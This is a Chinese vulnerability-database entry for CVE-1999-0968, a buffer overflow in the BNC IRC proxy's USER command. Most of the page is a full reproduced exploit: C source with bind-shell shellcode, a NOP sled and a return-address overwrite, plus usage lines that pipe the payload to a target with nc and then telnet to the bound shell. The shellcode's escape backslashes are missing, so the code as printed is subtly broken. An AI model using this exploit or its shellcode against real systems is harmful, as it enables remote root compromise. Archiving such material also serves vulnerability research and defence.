BNC IRC端口缓冲区溢出漏洞

BNC IRC端口缓冲区溢出漏洞

漏洞ID 1105390 漏洞类型 缓冲区溢出
发布时间 1998-12-26 更新时间 2005-05-02
图片[1]-BNC IRC端口缓冲区溢出漏洞-安全小百科CVE编号 CVE-1999-0968
图片[2]-BNC IRC端口缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-199812-020
漏洞平台 Unix CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/20395
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199812-020
|漏洞详情
BNCIRC代理存在缓冲区溢出漏洞。远程攻击者可以利用其获得权限。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/1927/info

BNC's IRC Proxy is used as a gateway to an IRC server.

A buffer stores a username which arguments the program's USER command. User-supplied input to this buffer is improperly checked for length.

As a result, the excessive data copied onto the stack can overwrite critical parts of the stack frame such as the calling functions' return address. Since this data is supplied by the user it can be crafted to alter the program's flow of execution. 

If properly exploited, this can yield root privilege to the attacker.
*/


/*
* SDI irc bouncer exploit
*
* This source exploits a buffer overflow in the bnc,
* popular irc bouncer, binding a shell.
*
* Tested against bnc 2.2.4 running on linux.
*
* usage:
* lame:~# gcc SDI-bnc.c -o SDI-bnc
*
* lame:~# (SDI-bnc 0; cat) | nc www.lame.org 666
* `-> offset, zero in most cases
*
* lame:~# telnet www.lame.org 10752
*
*
* by jamez and dumped from sekure SDI (www.sekure.org)
*
* email: [email protected]
*
* merry christmas and happy 1999 ;)
*
*/

/* c0nd0r :* */
char bindcode[] =
"x33xDBx33xC0xB0x1BxCDx80x33xD2x33xc0x8bxDAxb0x06"
"xcdx80xfexc2x75xf4x31xc0xb0x02xcdx80x85xc0x75x62"
"xebx62x5ex56xacx3cxfdx74x06xfexc0x74x0bxebxf5xb0"
"x30xfexc8x88x46xffxebxecx5exb0x02x89x06xfexc8x89"
"x46x04xb0x06x89x46x08xb0x66x31xdbxfexc3x89xf1xcd"
"x80x89x06xb0x02x66x89x46x0cxb0x2ax66x89x46x0ex8d"
"x46x0cx89x46x04x31xc0x89x46x10xb0x10x89x46x08xb0"
"x66xfexc3xcdx80xb0x01x89x46x04xb0x66xb3x04xcdx80xebx04"
"xebx4cxebx52x31xc0x89x46x04x89x46x08xb0x66xfexc3xcdx80"
"x88xc3xb0x3fx31xc9xcdx80xb0x3fxfexc1xcdx80xb0x3fxfexc1"
"xcdx80xb8x2ex62x69x6ex40x89x06xb8x2ex73x68x21x40x89x46"
"x04x31xc0x88x46x07x89x76x08x89x46x0cxb0x0bx89xf3x8dx4e"
"x08x8dx56x0cxcdx80x31xc0xb0x01x31xdbxcdx80xe8x45xffxff"
"xffxFFxFDxFFx50x72x69x76x65x74x20x41x44x4Dx63x72x65x77";

#define SIZE 1600
#define NOP 0x90

char buffer[SIZE];

void main(int argc, char * argv[])
{
int i, x, offset = 0;
long addr;

if(argc > 1) offset = atoi(argv[1]);

addr = 0xbffff6ff + offset; /* evil addr */

for(i = 0; i < SIZE/3; i++)
buffer[i] = NOP;

for(x = 0; x < strlen(bindcode); i++, x++)
buffer[i] = bindcode[x];

for (; i < SIZE; i += 4)
{
buffer[i ] = addr & 0x000000ff;
buffer[i+1] = (addr & 0x0000ff00) >> 8;
buffer[i+2] = (addr & 0x00ff0000) >> 16;
buffer[i+3] = (addr & 0xff000000) >> 24;
}

buffer[SIZE - 1] = 0;

printf("USER %sn", buffer);

}
|参考资料

来源:XF
名称:bnc-proxy-bo(1546)
链接:http://xforce.iss.net/static/1546.php
来源:BID
名称:1927
链接:http://www.securityfocus.com/bid/1927
来源:BUGTRAQ
名称:19981226bncexploit
链接:http://www.securityfocus.com/archive/1/11711

相关推荐: DansGuardian被拒绝URL跨站脚本漏洞

DansGuardian被拒绝URL跨站脚本漏洞 漏洞ID 1107530 漏洞类型 跨站脚本 发布时间 2003-10-22 更新时间 2003-12-31 CVE编号 CVE-2003-1506 CNNVD-ID CNNVD-200312-424 漏洞平台…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享